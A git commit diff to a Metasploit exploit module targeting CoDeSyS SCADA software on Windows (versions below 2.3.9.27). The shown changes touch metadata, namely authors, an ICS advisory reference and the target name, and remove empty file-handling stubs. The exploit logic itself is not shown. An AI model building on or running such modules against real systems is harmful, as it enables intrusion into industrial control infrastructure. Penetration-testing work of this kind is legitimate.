Fixed EOL, bad indent, added header, removed #!/usr/env/ruby

bug/bundler_fix
Enrique A. Sanchez Montellano 2013-03-06 10:44:29 -08:00
parent aa3a54fba0
commit 437d6d6ba6
1 changed files with 3 additions and 10 deletions

View File

@ -18,18 +18,17 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => 'Author' =>
[ [
'Aaron Portnoy <aaron@exodusintel.com>',
'Enrique Sanchez <esanchez@accuvant.com>' 'Enrique Sanchez <esanchez@accuvant.com>'
], ],
'License' => 'MSF_LICENSE', 'License' => 'MSF_LICENSE',
'References' => 'References' =>
[ [
['Exodus Intel Training', '02-2013'] ['ICSA-13-050-01', '02-19-2013']
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
['Windows Universal', { }] ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
@ -77,12 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("File uploaded") print_status("File uploaded")
end end
def remove_file
end
def read_file
end
def exploit def exploit
print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}") print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")